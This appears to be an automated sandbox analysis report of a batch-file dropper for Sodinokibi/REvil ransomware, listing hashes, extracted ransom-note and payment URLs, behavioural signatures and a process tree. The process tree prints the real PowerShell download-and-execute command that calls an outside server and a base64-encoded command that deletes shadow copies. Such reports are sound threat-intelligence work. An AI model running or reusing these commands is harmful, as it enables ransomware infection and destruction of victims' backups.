Analysis
-
max time kernel
134s -
max time network
53s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
05-05-2020 09:10
Static task
static1
Behavioral task
behavioral1
Sample
DnRWHnp4.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
DnRWHnp4.bat
Resource
win10v200430
General
-
Target
DnRWHnp4.bat
-
Size
195B
-
MD5
94468061a94b1bdd17ebc1b6bbb3e47b
-
SHA1
b4a5680c8598467c4a916ba37d936606820449be
-
SHA256
3e7bed4a943497b3c8a6874e6981a1f3b1799f14f9a4987829baea095fbba311
-
SHA512
18a6e54cbec9c80d7a03c6af01b1fc538c5d245dad3ea2c48fb2faf3773008fa50e1db201d4246c6019b94717fa7959607d9b71271442b93e787a786e691c166
Malware Config
Extracted
http://185.103.242.78/pastes/DnRWHnp4
Extracted
C:\4711165170-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/CA170DC00071CC2E
http://decryptor.cc/CA170DC00071CC2E
Signatures
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 644 powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1432 wrote to memory of 644 1432 cmd.exe powershell.exe PID 644 wrote to memory of 1844 644 powershell.exe powershell.exe PID 644 wrote to memory of 1844 644 powershell.exe powershell.exe PID 644 wrote to memory of 1844 644 powershell.exe powershell.exe PID 644 wrote to memory of 1844 644 powershell.exe powershell.exe -
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives 3 TTPs
-
Drops file in Program Files directory 23 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\LockUnblock.ppt powershell.exe File opened for modification \??\c:\program files\RequestDisconnect.php powershell.exe File opened for modification \??\c:\program files\CheckpointHide.mpv2 powershell.exe File opened for modification \??\c:\program files\ConvertUse.DVR-MS powershell.exe File opened for modification \??\c:\program files\CompareInitialize.m4a powershell.exe File opened for modification \??\c:\program files\FindConfirm.dot powershell.exe File created \??\c:\program files\microsoft sql server compact edition\4711165170-readme.txt powershell.exe File opened for modification \??\c:\program files\ResizeCopy.vdw powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\4711165170-readme.txt powershell.exe File opened for modification \??\c:\program files\CheckpointConvert.vdx powershell.exe File opened for modification \??\c:\program files\CloseMeasure.tmp powershell.exe File opened for modification \??\c:\program files\ShowWait.wmx powershell.exe File opened for modification \??\c:\program files\DisableEdit.bmp powershell.exe File opened for modification \??\c:\program files\NewProtect.M2V powershell.exe File opened for modification \??\c:\program files\LimitExit.iso powershell.exe File opened for modification \??\c:\program files\OutOpen.wma powershell.exe File opened for modification \??\c:\program files\SaveMount.au3 powershell.exe File opened for modification \??\c:\program files\StopFormat.html powershell.exe File opened for modification \??\c:\program files\UnpublishRename.xlsb powershell.exe File opened for modification \??\c:\program files\UseReset.txt powershell.exe File created \??\c:\program files\4711165170-readme.txt powershell.exe File created \??\c:\program files (x86)\4711165170-readme.txt powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\4711165170-readme.txt powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 644 powershell.exe Token: SeDebugPrivilege 644 powershell.exe Token: SeDebugPrivilege 1844 powershell.exe Token: SeBackupPrivilege 1580 vssvc.exe Token: SeRestorePrivilege 1580 vssvc.exe Token: SeAuditPrivilege 1580 vssvc.exe Token: SeTakeOwnershipPrivilege 644 powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 644 powershell.exe 644 powershell.exe 644 powershell.exe 1844 powershell.exe 1844 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 1 644 powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\i920x0fj3.bmp" powershell.exe -
Makes http(s) request 1 IoCs
Contacts server via http/https, possibly for C2 communication.
Processes:
description flow ioc HTTP URL 1 http://185.103.242.78/pastes/DnRWHnp4
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\DnRWHnp4.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1432 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/DnRWHnp4');Invoke-GZYYYWYTPJDW;Start-Sleep -s 10000"2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Sets desktop wallpaper using registry
PID:644 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1844
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1580